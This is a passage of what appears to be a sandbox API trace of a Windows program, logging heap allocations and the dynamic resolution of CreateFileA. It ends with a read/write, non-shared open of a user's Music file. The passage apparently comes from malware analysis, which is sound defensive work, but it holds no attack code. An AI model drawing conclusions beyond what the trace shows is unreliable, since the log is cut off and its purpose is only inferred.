Flags=0x0, Size=0x8) returned 0x8e1930 [0188.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0188.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0188.267] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0188.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0188.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0188.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0188.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0188.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0188.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0188.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0188.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0188.268] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0188.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0188.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0188.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0188.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0188.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0188.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0188.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0188.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0188.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0188.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0188.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0188.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0188.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0188.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0188.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0188.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0188.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0188.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0188.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0188.272] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0188.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0188.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0188.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0188.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0188.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0188.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.275] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0188.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd990 [0188.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd990, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0188.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.275] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0188.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0188.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd990 [0188.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd990, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0188.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.276] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0188.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0188.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0188.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0188.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0188.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0188.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2e) returned 0x9bf310 [0188.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3", cchWideChar=46, lpMultiByteStr=0x9bf310, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3", lpUsedDefaultChar=0x0) returned 46 [0188.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0188.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0188.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.277] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xhgr3.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0188.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0188.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0188.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0188.278] RtlAllocateHeap 